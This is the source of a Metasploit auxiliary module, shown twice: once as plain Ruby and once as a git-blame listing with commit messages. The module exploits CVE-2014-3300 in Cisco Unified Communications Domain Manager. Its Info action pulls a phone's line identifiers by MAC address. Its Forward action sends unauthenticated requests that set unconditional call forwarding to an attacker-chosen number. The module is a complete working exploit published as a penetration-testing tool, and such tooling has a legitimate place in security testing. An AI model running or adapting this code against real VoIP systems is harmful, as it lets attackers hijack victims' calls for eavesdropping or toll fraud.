metasploit-framework/modules/auxiliary/voip/cisco_cucdm_call_forward.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
      'Description' => %q{
        The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
        (CDM) 10 does not properly implement access control, which allows remote attackers to
        modify user information. This module exploits the vulnerability to configure unauthorized
        call forwarding.
      },
      'Author'      => 'fozavci',
      'References'  =>
        [
          ['CVE', '2014-3300'],
          ['BID', '68331']
        ],
      'License'     => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
          [ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
        ],
      'DefaultAction'  => 'Info'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
        OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
        OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
        OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])
      ], self.class)
  end

  def run
    case action.name.upcase
    when 'INFO'
      get_info
    when 'FORWARD'
      forward_calls
    end
  end

  def get_info
    uri = normalize_uri(target_uri.to_s)
    mac = datastore["MAC"]

    print_status("#{peer} - Getting fintnumbers and display names of the IP phone")

    res = send_request_cgi(
        {
            'uri'    => normalize_uri(uri, 'showcallfwd.cgi'),
            'method' => 'GET',
            'vars_get' => {
                'device' => "SEP#{mac}"
            }
        })

    unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
      print_error("#{peer} - Target appears not vulnerable!")
      print_status("#{res}")
      return []
    end

    doc = REXML::Document.new(res.body)
    lines = []
    fint_numbers = []

    list = doc.root.get_elements('MenuItem')

    list.each do |lst|
      xlist = lst.get_elements('Name')
      xlist.each {|l| lines << "#{l[0]}"}
      xlist = lst.get_elements('URL')
      xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }
    end

    lines.size.times do |i|
      print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
    end

    fint_numbers
  end

  def forward_calls
    # for a specific FINTNUMBER redirection
    uri = normalize_uri(target_uri.to_s)
    forward_to = datastore["FORWARDTO"]
    mac = datastore["MAC"]

    if datastore['FINTNUMBER']
      fint_numbers = [datastore['FINTNUMBER']]
    else
      fint_numbers = get_info
    end

    if fint_numbers.empty?
      print_error("#{peer} - FINTNUMBER required to forward calls")
      return
    end

    fint_numbers.each do |fintnumber|

      print_status("#{peer} - Sending call forward request for #{fintnumber}")

      send_request_cgi(
          {
              'uri'    => normalize_uri(uri, 'phonecallfwd.cgi'),
              'method' => 'GET',
              'vars_get' => {
                  'cfoption'     => 'CallForwardAll',
                  'device'       => "SEP#{mac}",
                  'ProviderName' => 'NULL',
                  'fintnumber'   => "#{fintnumber}",
                  'telno1'       => "#{forward_to}"
              }
          })

      res = send_request_cgi(
          {
              'uri'    => normalize_uri(uri, 'showcallfwdperline.cgi'),
              'method' => 'GET',
              'vars_get' => {
                  'device'     => "SEP#{mac}",
                  'fintnumber' => "#{fintnumber}"
              }
          })

      if res && res.body && res.body && res.body.to_s =~ /CFA/
        print_good("#{peer} - Call forwarded successfully for #{fintnumber}")
      else
        print_status("#{peer} - Call forward failed.")
      end
    end
  end

end
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00			`##`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'rexml/document'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::HttpClient`

Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',`
			`'Description' => %q{`
Beautify description 2015-01-10 06:02:42 +00:00			`The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager`
Beautify descriptions 2015-01-10 07:10:08 +00:00			`(CDM) 10 does not properly implement access control, which allows remote attackers to`
Various grammar, spelling, word choice fixes 2015-01-26 17:00:07 +00:00			`modify user information. This module exploits the vulnerability to configure unauthorized`
Beautify descriptions 2015-01-10 07:10:08 +00:00			`call forwarding.`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`},`
			`'Author' => 'fozavci',`
			`'References' =>`
			`[`
			`['CVE', '2014-3300'],`
			`['BID', '68331']`
			`],`
			`'License' => MSF_LICENSE,`
			`'Actions' =>`
			`[`
Beautify description 2015-01-10 06:02:42 +00:00			`[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],`
			`[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`],`
			`'DefaultAction' => 'Info'`
			`))`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
			`register_options(`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`[`
			`OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),`
			`OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),`
			`OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),`
			`OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])`
			`], self.class)`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00			`end`

			`def run`
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`case action.name.upcase`
			`when 'INFO'`
			`get_info`
			`when 'FORWARD'`
			`forward_calls`
			`end`
			`end`

			`def get_info`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00			`uri = normalize_uri(target_uri.to_s)`
send_request_cgi already URI encodes 2015-01-10 06:06:26 +00:00			`mac = datastore["MAC"]`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`print_status("#{peer} - Getting fintnumbers and display names of the IP phone")`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
			`res = send_request_cgi(`
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`{`
			`'uri' => normalize_uri(uri, 'showcallfwd.cgi'),`
			`'method' => 'GET',`
			`'vars_get' => {`
			`'device' => "SEP#{mac}"`
			`}`
			`})`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/`
			`print_error("#{peer} - Target appears not vulnerable!")`
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`print_status("#{res}")`
			`return []`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`end`

			`doc = REXML::Document.new(res.body)`
			`lines = []`
			`fint_numbers = []`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`list = doc.root.get_elements('MenuItem')`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`list.each do \|lst\|`
			`xlist = lst.get_elements('Name')`
			`xlist.each {\|l\| lines << "#{l[0]}"}`
			`xlist = lst.get_elements('URL')`
			`xlist.each {\|l\| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }`
			`end`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`lines.size.times do \|i\|`
			`print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")`
			`end`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`fint_numbers`
			`end`

			`def forward_calls`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`# for a specific FINTNUMBER redirection`
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`uri = normalize_uri(target_uri.to_s)`
			`forward_to = datastore["FORWARDTO"]`
			`mac = datastore["MAC"]`

			`if datastore['FINTNUMBER']`
			`fint_numbers = [datastore['FINTNUMBER']]`
			`else`
			`fint_numbers = get_info`
			`end`

			`if fint_numbers.empty?`
			`print_error("#{peer} - FINTNUMBER required to forward calls")`
			`return`
			`end`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`fint_numbers.each do \|fintnumber\|`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`print_status("#{peer} - Sending call forward request for #{fintnumber}")`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`send_request_cgi(`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`{`
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),`
			`'method' => 'GET',`
			`'vars_get' => {`
			`'cfoption' => 'CallForwardAll',`
			`'device' => "SEP#{mac}",`
			`'ProviderName' => 'NULL',`
			`'fintnumber' => "#{fintnumber}",`
			`'telno1' => "#{forward_to}"`
			`}`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`})`

Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`res = send_request_cgi(`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`{`
Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),`
			`'method' => 'GET',`
			`'vars_get' => {`
			`'device' => "SEP#{mac}",`
			`'fintnumber' => "#{fintnumber}"`
			`}`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00			`})`

Refactor cisco_cucdm_callforward 2015-01-10 06:27:31 +00:00			`if res && res.body && res.body && res.body.to_s =~ /CFA/`
			`print_good("#{peer} - Call forwarded successfully for #{fintnumber}")`
			`else`
			`print_status("#{peer} - Call forward failed.")`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00			`end`
			`end`
			`end`
Do First callforward cleanup 2015-01-10 06:00:27 +00:00
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 00:46:52 +00:00			`end`